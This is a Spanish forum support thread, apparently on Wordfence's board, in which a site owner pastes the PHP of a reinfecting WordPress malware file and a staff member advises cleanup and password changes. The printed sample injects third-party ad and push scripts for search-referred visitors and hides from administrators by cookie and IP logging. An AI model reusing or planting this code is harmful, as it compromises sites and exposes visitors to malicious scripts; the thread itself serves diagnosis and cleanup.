Pregunta sobre Wordfence Security de Wordpress:

Archivo de infecci贸n de malware principal de WordPress: wp-include / wp-tmp.php

Un usuario pregunt贸 馃憞

Hola, El siguiente archivo infectado de Malware core WordPress: wp-include / wp-tmp.php. Si trato de eliminarlo, se crea. 驴C贸mo eliminar completamente esta parte?

ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='xxx';

if ( ! function_exists( 'slider_option' ) ) {  

function slider_option($content){ 
if(is_single())
{

$con = '
';

$con2 = '

<script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2731682" async data-cfasync="false"></script>
<script src="//pushazam.com/ntfc.php?p=2731685" data-cfasync="false" async></script>
';

$content=$content.$con2;
}
return $content;
} 

function slider_option_footer(){ 
if(!is_single())
{

$con2 = '

<script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2731682" async data-cfasync="false"></script>
<script src="//pushazam.com/ntfc.php?p=2731685" data-cfasync="false" async></script>
';

echo $con2;
}
} 

function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }

if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}

if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
[email protected]_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);

}

}

$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
    $sevisitor=true;
  }
}

if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
{
[email protected]_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

} 

}
Thenks

Este tema fue modificado hace 1 a帽o, 3 meses por. Este tema fue modificado hace 1 a帽o, 3 meses por.

(@wfgerald)

Hace 1 a帽o, 3 meses

Hola @zotezo,

Eliminar el c贸digo y almacenarlo nuevamente significa que el sitio a煤n est谩 infectado y el punto de entrada del parche no lo est谩. Recomendar铆a cambiar todas las contrase帽as de inmediato, incluidos WordPress, FTP, hosting y base de datos. La siguiente gu铆a puede ayudarlo a rastrear el problema y limpiar el sitio. Sin embargo, si el c贸digo regresa, sugerir铆a limpiar el sitio y empaquetar el punto de entrada con un servicio profesional de reparaci贸n de pirateo.

https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

Gracias,

Gerroald

驴Solucion贸 tu problema??

0 / 0

Deja una respuesta 0

Tu direcci贸n de correo electr贸nico no ser谩 publicada. Los campos obligatorios est谩n marcados con *